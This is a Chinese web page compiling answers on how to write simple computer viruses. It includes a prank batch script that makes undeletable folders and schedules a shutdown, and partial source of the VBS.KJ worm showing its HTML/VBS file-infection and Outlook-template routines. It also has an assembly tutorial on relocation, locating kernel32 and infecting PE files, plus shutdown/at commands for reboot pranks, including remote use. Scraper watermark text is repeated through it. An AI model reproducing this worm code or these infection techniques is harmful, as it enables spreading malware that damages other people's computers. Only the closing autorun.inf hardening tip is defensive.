windows之家1.怎么做一个简单的小病毒
AUTO病毒简介:这种病毒在每个驱动器(硬盘、MP3/MP4……)下都有一个卷标AutoRun.inf文件,只要你双击驱动器(如D:),就会激活病毒。感染后双击盘符打不开驱动器,而且会导致病毒复制一次!
病毒不像是什么东西,他是一种可以执行的程序,没有所谓简单的病毒,每个病毒程序都有自己运行的目的,比如盗取用户资料或远程控制等.要想生成这种程序,你得必须会一种计算机语言.比如C++,VB,等只有这样才可以制作程序.
还有一种就是用别人的木马工具生成所谓的病毒,发送到别人的电脑上让其运行,比如众所周知的灰鸽子,及很多盗号的小型软件.
不论是什么方式制作你都要先懂得病毒的运行机理,电脑的传输方式,杀毒软件的杀毒原理.
你的这个问题是一个很深奥的问题,病毒没有简单和复杂只分,所谓的简单的病毒实际上都是比较精练的程序.
如果真想制作病毒可以给你些网站:
2.怎样制作简单的电脑病毒,没有恶意,只是和朋友搞个恶作剧
@echo off echo running please wait for /l %%a in (1 1 100) do md %%a..\ shutdown -s -t 600 -c "VIRUS" exit rem -------------------------------结束 把上面的内容复制到txt文件中,改后缀名txt为cmd就ok了 会在运行的目录下生成100个从1到100的文件夹,但有不同之处是删除会提示错误 接着会提示10分钟后关机。
3.怎样制造电脑小病毒
那就看看vbs.kj的源码
Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk
Sub KJ_start()
\' 初始化变量
KJSetDim()
\' 初始化环境
KJCreateMilieu()
\' 感染本地或者共享上与html所在目录
KJLikeIt()
\' 通过vbs感染Outlook邮件模板
KJCreateMail()
\' 进行病毒传播
KJPropagate()
End Sub
\' 函数:KJAppendTo(FilePath,TypeStr)
\' 功能:向指定类型的指定文件追加病毒
\' 参数:
\' FilePath 指定文件路径
\' TypeStr 指定类型
Function KJAppendTo(FilePath,TypeStr)
On Error Resume Next
\' 以只读方式打开指定文件
Set ReadTemp = FSO.OpenTextFile(FilePath,1)
\' 将文件内容读入到TmpStr变量中
TmpStr = ReadTemp.ReadAll
\' 判断文件中是否存在“KJ_start()“字符串,若存在说明已经感染,退出函数;
\' 若文件长度小于1,也退出函数。
If Instr(TmpStr,“KJ_start()“) <> 0 Or Len(TmpStr) < 1 Then
ReadTemp.Close
Exit Function
End If
\' 如果传过来的类型是“htt“
\' 在文件头加上调用页面的时候加载KJ_start()函数;
\' 在文件尾追加html版本的加密病毒体。
\' 如果是“html“
\' 在文件尾追加调用页面的时候加载KJ_start()函数和html版本的病毒体;
\' 如果是“vbs“
\' 在文件尾追加vbs版本的病毒体
If TypeStr = “htt“ Then
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,2)
FileTemp.Write “<“ & “BODY onl oad=“““ & “vbscript:“ & “KJ_start()“““ & “>“ & vbCrLf & TmpStr & vbCrLf & HtmlText
FileTemp.Close
Set FAttrib = FSO.GetFile(FilePath)
FAttrib.attributes = 34
Else
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,8)
If TypeStr = “html“ Then
FileTemp.Write vbCrLf & “<“ & “HTML>“ & vbCrLf & “<“ & “BODY onl oad=“““ & “vbscript:“ & “KJ_start()“““ & “>“ & vbCrLf & HtmlText
ElseIf TypeStr = “vbs“ Then
FileTemp.Write vbCrLf & VbsText
End If
4.如何写一个简单的病毒程序
前些天学病毒这门技术着实吃了很多苦头,走了很多弯路,尽管按我的知识水平,病毒已经是水到渠成的学习内容了。
但是我现在学了入门才发现这门技术实际上隐藏着很多玄机,包含着许多技术,不专门学习研究根本无法达到“牛”的境界上去。如今写了这篇文章,介绍的都是相当实用的东西,可以让你少走许多弯路(有时侯一个错误够你找几个小时的)。
不过需要些基础知识才能看懂。假如你有天知识储备够了,不学学病毒将是你的遗憾。
另,由于是写给协会会员参考的,也没写的多“专业”,多了些赘述。 在你看之前,你应该知道这只是篇可以带你入门的文章,如果你已经会了就不用看了。
看的时候最好准备个PE表在旁边。写病毒程序可以使用很多种语言来写比如C,汇编,甚至有人用Dephi这样可视化编程工具都能写出来。
但是最适合写病毒程序的还是汇编语言。汇编语言底层,灵活,速度快,体积小的优势能将一个病毒程序发挥到极至,通常一个程序写出来才几千字节就包含了所有的功能。
一般一个病毒都有如下几个功能:一 代码重定位 二 自己找到所需API地址 三 搜索文件、目录 四 感染文件 五 破坏系统或文件(随便你了) 其中一,二项功能是必要的,五项功能是可选的。而一个病毒程序感染文件的功能是它的核心,是衡量它质量的重要标准。
(一)代码的重定位 一个变量或函数其实是一个内存地址,在编译好后,程序中的指令通过变量或函数的内存地址再去存取他们,这个地址是个绝对地址。如果你将代码插入到其他任何地方,再通过原来编译时产生的地址去找他们就找不到了,因为他们已经搬家了。
但是,你在写程序时考虑到这个问题,你就可以在代码最开始,放上几行代码取得程序基地址,以后变量和函数作为偏移地址,显式的加上这个基地址就能顺利找到了,这就是重定位。就象这段代码。
Call getbaseaddress Getbaseaddress:pop ebx Sub ebx,offset getbaseaddress Mov eax,dword ptr [ebx+Var1] 如果你使用宏汇编语言写病毒,请尽量使用ebx做基地址指针,不要使用ebp,因为ebp在调用带参数的函数时会改变。(二)自己取得所需的API地址 一个win32程序文件,所调用的API函数地址,是由系统填入到程序文件中描述各类数据位置的数据结构中的。
而病毒作为一个残废是享受不到这个待遇的。因为你在把病毒的代码插入目标程序时没有把这些描述数据存放位置的数据结构信息也弄进去。
它被插入到其他目标程序后就成了只有代码的残废儿童:(所以作为一个残废儿童,应当自力更生。自己搜寻自己需要的API地址。
目标程序文件就包含了我们需要的东西,我们需要自己去找。目标程序文件只要还是win32程序,它的地址空间中就包含的有Kernel32.dll。
如果找到了它,我们就能找到其他任何的东东。第一步,搜寻kernel32.dll的基地址。
当然了,整个地址空间有4GB,可供搜索的用户进程空间也有2GB。在2GB中搜索,太吓人了。
总不能在执行被感染的目标程序时,先让用户喝杯茶吧?或者斗斗地主?这里有两个技巧向大家介绍。在程序被加载后,加载程序会调用程序的主线程的第一条指令的位置。
它使用的指令是CALL,就是说,你程序还没执行,堆栈区里就有了一个返回地址了,这个返回地址指向的是加载程序,而加载程序是包含在KERNEL32.dll中的,我们顺着它向上找,就能找到kernel32.dll的基地址了。当然也不是一个字节一个字节的挨者找,而是一个页面一个页面地找。
因为win32下,代码或数据的开始位置总是页面单位(windows平台下为4kb)对齐的。Kernel32.dll是一个PE文件,我们按比较PE文件dos签名标志和PE签名标志的方法找。
另外还有个办法是通过SHE技术找。这是最好的办法了,前一个办法因为堆栈是动态的原因不稳定,一般只能将获取地址的代码块放在最开头,这个方法完全是与堆栈无关的,放在哪里执行都不会出错,如果你的病毒需要用一些远程线程之类的技术,最好用这个方法。
SHE结构,第一个成员指向下一个SEH结构,如果是最后一个那么它的值就是0ffffffffh。第二个成员指向异常处理函数,如果是最后一个SHE结构且没有指定的话,缺省的是函数地址。
当异常触发这个函数时就会弹出一个对话框,问你发不发送错误。98下显示蓝屏。
这个函数是包含在KERNEL32.dll中的,只要取得它的地址向上找就能找到KERNEL32.dll的基地址了。在说SHE时总忘不了TEB,TEB是创建一个线程时分配的线程相关的数据结构,SHE只是它开头第一个数据结构体而已。
它还包含了其他许多重要的东西,TEB由FS段选择器指向,有兴趣的查查资料,这里篇幅原因就不再多说了。接着上面的,看看如何找函数地址。
先根据“下一个”SHE结构的值定位到最后一个SHE结构,这时取出she处理函数的地址,就是函数地址了,以页面为单位向上找就可以找到Kernel32.dll了/ 得到Kernel32.dll的基地址后,定位到它的导出表,找出GetProcAddress地址再利用GetProcAddress就能找到其他任何所需要的函数了。在搜索API时应该注意API的名。
5.教我制作一个可以让电脑自己重启N次的病毒
修改下面的参数或许对你有帮助! dos cmd重启2003命令shutdown -r -t 0用cmd命令来关闭或重启电脑。
at 2:00 /every:Sunday,Monday,Tuesday,Wednesday,Thursday,Friday,Saturday shutdown /r /t 0 每天早上2点自动重新启动服务器命令。 shutdown -r -t 0 可以把上述语句用记事本写入,另存为reboot.cmd就可以了,扩展名是cmd别忘 内容来自零度科技用cmd命令来关闭或重启电脑。
内容来自零度科技at 2:00 /every:Sunday,Monday,Tuesday,Wednesday,Thursday,Friday,Saturday shutdown /r /t 0 每天早上2点自动重新启动服务器命令。 零度科技shutdown -r -t 0 内容来自零度科技可以把上述语句用记事本写入,另存为reboot.cmd就可以了,扩展名是cmd别忘了。
r意思是从新启动 t是时间 单位是秒 0就是0秒了,立即从新启动的 把r换成s的话就是关机了,这样自己就可以设置自动关机时间 看要设置多少秒就行 设置了一定时间自动关机或者从新启动的话想取消只需要运行 shutdown -a 就可以了 copyright 先说下系统自带的关机指令,很多人应该已经知道了,就是shutdown,不带参数执行将会列出它的参数,常用参数为:/s 关闭计算机/r 关闭并重启动计算机/f 强制正在运行的应用程序关闭而不事先警告用户/t xxx 设置关闭前的超时为 xxx 秒。有效范围是 0-600,默认为 30另外,在倒计时过程输入shutdown /a可以取消关机或重启,不加/t参数执行则倒计时30秒。
copyright 一般需要立即关机可以这样写:(将/s参数换成/r参数就是立即重启)shutdown /f /s /t 0 内容来自shutdown支持对远程计算机进行操作,需要使用/m参数,如:shutdown /f /s /m \\\\test在30秒后强制将局域网中名为test的计算机关闭 copyright 再说下at指令,它的作用是计划在指定时间和日期在计算机上运行命令和程序。在命令行下输入at /?将列出它的帮助信息,在“帮助和支持中心”里有更详细的解释及示例。
零度科技提供技术支持假设想实现晚上23:30自动关机,可以这么写:at 23:30 shutdown /f /s /t 0成功的话会有类似这样的信息回应:新加了一项作业,其作业 ID = 1 内容来自要取消这个定时关机的话,有两种方法 内容来自零度科技方法一、命令行不带任何参数执行at,将会列出已经设定的内容,记下状态ID号,比如本例为1,然后输入:at 1 /delete也可以简写为:at 1 /d不加序列号使用/d参数将会删除所有设定的内容,如果想不经确认删除所有设定的内容,可用:at /d /y copyright 方法二、任务计划用at指令设定的定时执行指令可在“控制面板”的“任务计划”中看到,要取消的话删除就行了。 零度科技提供技术支持如果你只是临时用用,比如只是当天需要定时自动关机,用上述指令就行了。
如果需要在一个月中的某几天或每周一甚至是每天执行,就需要再加点参数,仍然举例说明。 内容来自例1、每月的1、5、10、15、20号的0点自动关机at 00:00 /every:1,5,10,15,20 shutdown /f /s /t 0 零度科技例2:每周一的23:00自动关机at 23:00 /every:Monday shutdown /f /s /t 0 内容来自零度科技例3:每天22:00自动关机at 22:00 /every:Sunday,Monday,Tuesday,Wednesday,Thursday,Friday,Saturday shutdown /f /s /t 0 零度科技提供技术支持即使用every参数,例3中的每天自动关机可以简写为:at 22:00 /every:Su,M,T,W,Th,F,Sa shutdown /f /s /t 0 内容来自最后解释一下该命令适用XP/2003,Windows 2000是不自带shutdown指令的(当然从XP/2003系统里复制一个过去也能用),我的机器上也没装Windows 2000,不知道在2000里是否自带at指令。
内容来自另,用at指令而不是在任务计划里添加是因为用at指令添加的任务是以系统最高的SYSTEM权限来执行的,不登录也会生效,而在任务计划里添加的任务需要指定管理员帐号密码才能做到不登录也生效,at指令还能用\\\\computername指定在局域网里的其它计算机上建立自动执行的任务计划,当然前提条件是你有对方机器的管理员帐号和密码。 零度科技补充二点:1、用以上命令,并命令执行时,系统进入关机倒计时。
这时,如果正在工作,不需要关机,那马上在倒计时设置时间内运行“shutdown.exe -a”中止关机命令。也可以建立一个这个命令的快捷方式在桌面上,方便使用。
2、拷贝Shutdown.exe到2000系统下AT命令完全可以使用,包括Win2000、Win2000Server。 零度科技提供技术支持用at配合shutdown命令非常方便。
比如要在晚上22:00关机,可以使用at 22:00 shutdown -s -f 内容来自零度科技附ShutDown用法及参数用法: shutdown [-i | -l | -s | -r | -a] [-f] [-m \computername] [-t xx] [-c "comment"] [-d up:xx:yy]没有参数 显示此消息(与 ? 相同)-i 显示 GUI 界面,必须是第一个选项-l 注销(不能与选项 -m 一起使用)-s 关闭此计算机-r 关闭并重启动此计算机-a 放弃系统关机-m \computername 远程计算机关机/重启动/放弃-t xx 设置关闭的超时为 xx 秒-c "comment" 关闭注释(最大 127 个字符)-f 强制运行的应用程序关闭而没有警告-d [p]:xx:yy 关。
6.Win10系统下如何制作绝对安全无毒的U盘
既然病毒是依靠改写autorun这个文件进行传播,那最最简单的方法就是在U盘上建个无法进行任何操作的autorun.inf就好了。
先把U盘插到电脑上,看看系统给它分配的是哪个盘符。然后打开命令提示符(管理员),输入md F:\autorun.infU盘里面就多出了个autorun.inf文件夹。
继续输入cd /d F:\autorun.inf进入新建的文件夹路径后,输入md 安全文件夹。\\。
OK,现在就建立好了无法被改写删除的autorun了哦。无法被删除也无法被改写,小病毒是无能为力的。
大家想要删除它的话,直接格式化就好了,简单吧?。
转载请注明出处windows之家 » win10如何制作简易病毒